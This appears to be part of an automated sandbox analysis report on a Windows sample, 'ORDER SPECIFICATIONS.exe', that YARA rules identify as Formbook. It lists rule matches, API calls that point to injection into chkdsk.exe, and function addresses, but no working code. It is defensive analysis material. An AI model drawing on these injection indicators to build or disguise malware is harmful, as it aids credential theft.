Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Show sources

Source: ORDER SPECIFICATIONS.exe, LogIn.cs	Long String: Length: 13656
Source: LvZiFDk.exe.0.dr, LogIn.cs	Long String: Length: 13656
Source: 0.0.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 0.2.ORDER SPECIFICATIONS.exe.6a0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.2.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.0.ORDER SPECIFICATIONS.exe.160000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 5.0.ORDER SPECIFICATIONS.exe.ac0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 5.2.ORDER SPECIFICATIONS.exe.ac0000.1.unpack, LogIn.cs	Long String: Length: 13656

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: ORDER SPECIFICATIONS.exe

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_004181B0 NtCreateFile,	5_2_004181B0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00418260 NtReadFile,	5_2_00418260
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_004182E0 NtClose,	5_2_004182E0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00418390 NtAllocateVirtualMemory,	5_2_00418390
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_004181AB NtCreateFile,	5_2_004181AB
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041838A NtAllocateVirtualMemory,	5_2_0041838A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_01509910
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015099A0 NtCreateSection,LdrInitializeThunk,	5_2_015099A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509840 NtDelayExecution,LdrInitializeThunk,	5_2_01509840
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01509860
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015098F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_015098F0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509A50 NtCreateFile,LdrInitializeThunk,	5_2_01509A50
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_01509A00
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509A20 NtResumeThread,LdrInitializeThunk,	5_2_01509A20
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509540 NtReadFile,LdrInitializeThunk,	5_2_01509540
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015095D0 NtClose,LdrInitializeThunk,	5_2_015095D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509710 NtQueryInformationToken,LdrInitializeThunk,	5_2_01509710
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509FE0 NtCreateMutant,LdrInitializeThunk,	5_2_01509FE0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509780 NtMapViewOfSection,LdrInitializeThunk,	5_2_01509780
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015097A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_015097A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_01509660
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015096E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_015096E0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509950 NtQueueApcThread,	5_2_01509950
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015099D0 NtCreateProcessEx,	5_2_015099D0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0150B040 NtSuspendThread,	5_2_0150B040
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509820 NtEnumerateKey,	5_2_01509820
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015098A0 NtWriteVirtualMemory,	5_2_015098A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509B00 NtSetValueKey,	5_2_01509B00
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0150A3B0 NtGetContextThread,	5_2_0150A3B0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509A10 NtQuerySection,	5_2_01509A10
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509A80 NtOpenDirectoryObject,	5_2_01509A80
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509560 NtWriteFile,	5_2_01509560
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0150AD30 NtSetContextThread,	5_2_0150AD30
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509520 NtWaitForSingleObject,	5_2_01509520
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015095F0 NtQueryInformationFile,	5_2_015095F0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0150A770 NtOpenThread,	5_2_0150A770
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509770 NtSetInformationFile,	5_2_01509770
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509760 NtOpenProcess,	5_2_01509760
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0150A710 NtOpenProcessToken,	5_2_0150A710
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509730 NtQueryVirtualMemory,	5_2_01509730
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509650 NtQueryValueKey,	5_2_01509650
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509670 NtQueryInformationProcess,	5_2_01509670
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01509610 NtEnumerateValueKey,	5_2_01509610
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015096D0 NtCreateKey,	5_2_015096D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589540 NtReadFile,LdrInitializeThunk,	16_2_05589540
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589910 NtAdjustPrivilegesToken,LdrInitializeThunk,	16_2_05589910
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055895D0 NtClose,LdrInitializeThunk,	16_2_055895D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055899A0 NtCreateSection,LdrInitializeThunk,	16_2_055899A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589840 NtDelayExecution,LdrInitializeThunk,	16_2_05589840
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589860 NtQuerySystemInformation,LdrInitializeThunk,	16_2_05589860
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589710 NtQueryInformationToken,LdrInitializeThunk,	16_2_05589710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589FE0 NtCreateMutant,LdrInitializeThunk,	16_2_05589FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589780 NtMapViewOfSection,LdrInitializeThunk,	16_2_05589780
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589650 NtQueryValueKey,LdrInitializeThunk,	16_2_05589650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589A50 NtCreateFile,LdrInitializeThunk,	16_2_05589A50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589660 NtAllocateVirtualMemory,LdrInitializeThunk,	16_2_05589660
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055896D0 NtCreateKey,LdrInitializeThunk,	16_2_055896D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055896E0 NtFreeVirtualMemory,LdrInitializeThunk,	16_2_055896E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589950 NtQueueApcThread,	16_2_05589950
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589560 NtWriteFile,	16_2_05589560
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0558AD30 NtSetContextThread,	16_2_0558AD30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589520 NtWaitForSingleObject,	16_2_05589520
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055899D0 NtCreateProcessEx,	16_2_055899D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055895F0 NtQueryInformationFile,	16_2_055895F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0558B040 NtSuspendThread,	16_2_0558B040
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589820 NtEnumerateKey,	16_2_05589820
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055898F0 NtReadVirtualMemory,	16_2_055898F0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055898A0 NtWriteVirtualMemory,	16_2_055898A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589770 NtSetInformationFile,	16_2_05589770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0558A770 NtOpenThread,	16_2_0558A770
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589760 NtOpenProcess,	16_2_05589760
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0558A710 NtOpenProcessToken,	16_2_0558A710
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589B00 NtSetValueKey,	16_2_05589B00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589730 NtQueryVirtualMemory,	16_2_05589730
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0558A3B0 NtGetContextThread,	16_2_0558A3B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_055897A0 NtUnmapViewOfSection,	16_2_055897A0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589670 NtQueryInformationProcess,	16_2_05589670
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589610 NtEnumerateValueKey,	16_2_05589610
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589A10 NtQuerySection,	16_2_05589A10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589A00 NtProtectVirtualMemory,	16_2_05589A00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589A20 NtResumeThread,	16_2_05589A20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05589A80 NtOpenDirectoryObject,	16_2_05589A80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB81B0 NtCreateFile,	16_2_00BB81B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB82E0 NtClose,	16_2_00BB82E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB8260 NtReadFile,	16_2_00BB8260
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB8390 NtAllocateVirtualMemory,	16_2_00BB8390
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB81AB NtCreateFile,	16_2_00BB81AB
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BB838A NtAllocateVirtualMemory,	16_2_00BB838A

Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 0_2_07252FD0	0_2_07252FD0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 0_2_07250040	0_2_07250040
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 0_2_07252FC0	0_2_07252FC0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 0_2_07250D83	0_2_07250D83
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041BB65	5_2_0041BB65
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041CB93	5_2_0041CB93
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00408C50	5_2_00408C50
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00408C0A	5_2_00408C0A
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041C42D	5_2_0041C42D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041B496	5_2_0041B496
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041C509	5_2_0041C509
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041C515	5_2_0041C515
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00402D8D	5_2_00402D8D
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0041BEFC	5_2_0041BEFC
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014CF900	5_2_014CF900
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E4120	5_2_014E4120
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01581002	5_2_01581002
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159E824	5_2_0159E824
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015928EC	5_2_015928EC
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DB090	5_2_014DB090
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F20A0	5_2_014F20A0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015920A8	5_2_015920A8
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01592B28	5_2_01592B28
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015803DA	5_2_015803DA
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158DBD2	5_2_0158DBD2
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014FEBB0	5_2_014FEBB0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015922AE	5_2_015922AE
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01591D55	5_2_01591D55
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01592D07	5_2_01592D07
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014C0D20	5_2_014C0D20
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_015925DD	5_2_015925DD
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014DD5E0	5_2_014DD5E0
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014F2581	5_2_014F2581
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158D466	5_2_0158D466
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014D841F	5_2_014D841F
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0159DFCE	5_2_0159DFCE
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01591FF1	5_2_01591FF1
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_0158D616	5_2_0158D616
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_014E6E30	5_2_014E6E30
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: 5_2_01592EF7	5_2_01592EF7
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05611D55	16_2_05611D55
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0554F900	16_2_0554F900
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05540D20	16_2_05540D20
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05564120	16_2_05564120
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555D5E0	16_2_0555D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05572581	16_2_05572581
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555841F	16_2_0555841F
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05601002	16_2_05601002
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0555B090	16_2_0555B090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_0557EBB0	16_2_0557EBB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_05566E30	16_2_05566E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBCB93	16_2_00BBCB93
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBBB65	16_2_00BBBB65
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBB496	16_2_00BBB496
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BA8C0A	16_2_00BA8C0A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BA8C50	16_2_00BA8C50
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BA2D90	16_2_00BA2D90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BA2D8D	16_2_00BA2D8D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBC515	16_2_00BBC515
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BBC509	16_2_00BBC509
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 16_2_00BA2FB0	16_2_00BA2FB0

Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: String function: 0554B150 appears 32 times
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe	Code function: String function: 014CB150 appears 45 times

Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263259287.0000000008E10000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261776702.00000000071D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261503180.0000000007010000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000000.230240287.0000000000718000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254790320.0000000002B49000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263499689.0000000008F10000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.263499689.0000000008F10000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000004.00000000.251795552.00000000001D8000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.299165468.000000000174F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.297762999.0000000000B38000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298398176.0000000001486000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameCHKDSK.EXEj% vs ORDER SPECIFICATIONS.exe
Source: ORDER SPECIFICATIONS.exe	Binary or memory string: OriginalFilenameObjectMap.exe6 vs ORDER SPECIFICATIONS.exe

Source: ORDER SPECIFICATIONS.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
